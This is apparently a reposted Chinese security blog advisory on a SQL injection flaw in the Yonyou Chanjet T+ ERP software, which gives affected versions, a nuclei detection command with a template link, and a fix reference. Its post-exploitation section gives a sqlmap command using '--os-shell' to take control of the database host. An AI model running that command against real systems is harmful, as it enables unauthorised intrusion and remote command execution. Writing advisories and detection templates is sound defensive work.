的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,极致攻防实验室及文章作者不为此承担任何责任。
简介:
用友畅捷通T+是一款企业资源规划(ERP)软件,功能模块包括:财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。
利用条件:
- T+版本13.0、T+版本16.0
-
官方安全补丁<13.000.001.0404
漏洞原理:
用友畅捷通T+未对后台功能做有效的身份认证与用户的输入进行安全过滤,导致在权限绕过后存在SQL注入漏洞,且用友畅捷通T+使用.NET开发通常配套使用SqlServer数据库,默认环境下利用此漏洞攻击者可以实现远程命令执行。
漏洞检测:
访问后台缺陷功能路径,nuclei检测命令如下:
./nuclei -u http://www.xxx.com/ -t ./ultimaste-nuclei-templates/yongyou-chanjettplus/chanjettplus-sqli.yaml
nuclei-templates:
https://github.com/UltimateSec/ultimaste-nuclei-templates/blob/main/yongyou-chanjettplus/chanjettplus-sqli.yaml
后利用思路:
用友畅捷通T+使用.NET开发通常配套使用SqlServer数据库,默认环境下利用此漏洞攻击者可以实现远程命令执行。
直接使用sql注入神器sqlmap获取主机权限即可:
python3 sqlmap.py -r post.txt --random-agent -v 3 --dbms mssql --hex --os-shell
修复方式:
参考:
https://stack.chaitin.com/techblog/detail?id=110
关于:某大厂红队成员,拥有多年国省hw红队渗透经验、擅长漏洞挖掘与武器化开发,极致攻防实验室公众号专注于分享高质量的漏洞实战文章与最实际的红队工具,敬请期待。
原文始发于微信公众号(极致攻防实验室):用友畅捷通T+ SQL注入漏洞 附检测POC (nuclei)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论